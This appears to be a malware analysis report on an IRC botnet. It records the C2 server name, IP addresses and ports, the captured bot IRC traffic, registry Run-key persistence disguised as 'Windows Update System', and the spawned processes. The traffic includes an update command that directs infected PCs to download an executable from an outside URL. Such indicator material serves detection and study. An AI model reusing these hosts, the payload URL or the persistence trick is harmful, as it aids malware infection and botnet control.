irc.accesox.net (botnet C2 hosted in Paris, France, at OVH SAS)

Remote Host       Port Number
222.122.46.122    80
91.121.96.162     6667
91.121.96.162     7000

NICK n{USA|XP}671615
NICK {USA|XP}077961
USER 0779 "" "TsGh" :0779
USER 7334 "" "TsGh" :7334
JOIN ##bote##
PRIVMSG ##bote## :[Update]: Updating to: http://www.lespel.co.kr/images/USB_Vlad.exe
JOIN #Weed
PRIVMSG #Weed :New PC Infected.
MODE pLagUe{USA}32852 -ix
MODE #Weed -ix
NICK pLagUe{USA}32852
USER SkuZ * ok
TeaM UniX b0at 0.4

Registry Modifications

* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = "%AppData%\hidserv.exe"
    + raidhost = "raidhost.exe"

    so that hidserv.exe runs every time Windows starts
    so that raidhost.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update System = "%AppData%\hidserv.exe"

    so that hidserv.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name    Process Filename         Main Module Size
raidhost.exe    %Windir%\raidhost.exe    331,776 bytes
ganja7.exe      %System%\ganja7.exe      331,776 bytes
ganja8.exe      %System%\ganja8.exe      331,776 bytes

Info about the hosting provider:
http://whois.domaintools.com/91.121.96.162
